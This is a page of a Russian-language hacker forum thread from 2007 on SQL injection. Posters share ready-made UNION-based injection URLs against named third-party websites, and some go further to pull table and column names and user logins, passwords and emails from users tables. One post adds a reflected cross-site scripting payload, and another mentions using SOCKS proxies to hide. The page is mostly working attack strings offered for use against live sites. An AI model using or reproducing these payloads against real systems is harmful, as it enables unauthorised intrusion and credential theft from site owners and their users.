SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 52 of 798
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    там PostgreSQL
    вот тебе циферка
     
    #1021 Spyder, 14 Mar 2007
  2. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    хм
     
    #1022 p-range, 14 Mar 2007
    1 person likes this.
  3. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Code:
    http://www.bathtubmusic.com/album.php?id=-1+union+select+1,2,version(),4/*
     
    #1023 Colkru, 14 Mar 2007
  4. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Люблю когда все так четко)

    Code:
    http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(version(),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(table_name,char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(column_name,char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.columns+where+table_name="SiteUser"/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(concat(user_id,char(58),user_login,char(58),user_pass,char(58),user_name),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+SiteUser/*
     
    #1024 Grey, 14 Mar 2007
  5. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    немного отойдя от шока продолжу своё неблагодарное дело =(




    Code:
    http://sex.dp.ua/topic.php?categor=-1+union+select+1,concat(login,char(58),password),3,4+from+users+limit+0,1/*
     
    #1025 Ksander, 14 Mar 2007
  6. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.imhoclub.ru/books/?did=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
    Code:
    http://www.ugweekend.ru/index.php?mag=07&nid=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*
    Code:
    http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(database(),char(58),user(),char(58),version()),char),9,10,11/*
http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(email,char),9,10,11+from+author/*
     
    #1026 Grey, 14 Mar 2007
  7. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-40+union+select+null,TABLE_NAME,null+FROM+INFORMATION_SCHEMA.TABLES--
    но хз как перебирать :(
     
    #1027 }{0TT@БЬ)Ч, 14 Mar 2007
    Last edited: 14 Mar 2007
  8. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    mssql
    Code:
    http://www.opentext.com/news/pr.html?id=1772+or+1772=@@version--
    Code:
    http://www.sumtotalsystems.com/success/login_global.html?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+regusers/*
     
    #1028 Constantine, 14 Mar 2007
    4 people like this.
  9. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.spoono.com/photoshop/tutorials/tutorial.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+from+users+limit+0,1/*
    юзеров 6, смотрим в тайтл.
    md5 вроде


    upd://
    Code:
    http://www.yuldash.com/tg/index.php?id=-1+union+select+version(),2,3,4,5,6,7/*&q=mes&pp=7
     
    #1029 n1†R0x, 14 Mar 2007
    Last edited: 14 Mar 2007
    1 person likes this.
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Хотабыч
    запрос должен выглядеть примерно так
     
    #1030 Spyder, 14 Mar 2007
    Last edited: 14 Mar 2007
    2 people like this.
  11. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Заюзал соксы и начал наверствовать упущеное :D :


    Code:
    http://pravoslavie.info/stat.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
    ____

    Code:
    http://www.cinefantastico.com/filmct.php?id=-1+union+select+1,2,3/*
    ____
    Softholm.com - 2500 посетителей в день

    Code:
    http://www.softholm.com/php/dd.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
    ___

    :)
     
    #1031 Colkru, 14 Mar 2007
    1 person likes this.
  12. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Code:
    http://www.cipmarseille.com/evenement_fiche.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14/*
    Всё я спать)
     
    #1032 Colkru, 14 Mar 2007
  13. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Так и не подобрал таблицу с юзверями(

    Code:
    http://www.yukka.ru/detail.php?id=7&pid=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
     
    #1033 Grey, 14 Mar 2007
    1 person likes this.
  14. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Таблицы не нашел :(
    Code:
    http://www.lygus.lt./ITC/news.php?id=-1+union+select+1,user(),3,version(),database()/*
     
    #1034 valiko, 14 Mar 2007
  15. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    http://www.allaboutjazz.com/
    Code:
    http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,version(),39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77/*
    http://www.caiguoqiang.com/
    Code:
    http://www.caiguoqiang.com/project_detail.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    В очередной раз первая скуль...надеюсь эти никто не выкладывал?)
     
    #1035 Horsekiller, 15 Mar 2007
  16. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://www.tomkeays.com/morris/faq/?mid=380000000%20union%20select%201,email,password,4,5,6,7,8,9,10,11,12,13,14%20from%20user/*

    http://www.tomkeays.com/morris/faq/?srch=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
     
    #1036 kair, 15 Mar 2007
    Last edited: 15 Mar 2007
    1 person likes this.
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    я выкладывал вроде как =)
     
    #1037 Spyder, 15 Mar 2007
  18. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Code:
    http://www.losingtoday.com/tales.php?id=-1+union+select+1,2,3,version(),5,6/*
    ___

    193 колонки :D , ппц:

    Code:
    http://shapes.aim-at-shape.net/view.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193/*
     
    #1038 Colkru, 15 Mar 2007
    1 person likes this.
  19. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Code:
    http://career.coe.missouri.edu/index.php?page=-1+union+select+1,2,convert(USER()+using+latin1),4,5,6,7,8,9,0,1/*
     
    #1039 VampiRUS, 15 Mar 2007
  20. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Перехожу на чтото более безопасное, на шопы например =)


    Code:
    http://best4her.net/shop.php?goods=-1+union+select+1,2,3,convert(version(),char),5,6,7,8,9,10,11,12/*
    Вот еще один, так же трабла =( 4 версия, названий 30 перебрал и ничего =(.

    Code:
    http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
     
    #1040 Ksander, 15 Mar 2007
    Last edited: 15 Mar 2007
    1 person likes this.
(You must log in or sign up to post here.)
Page 52 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.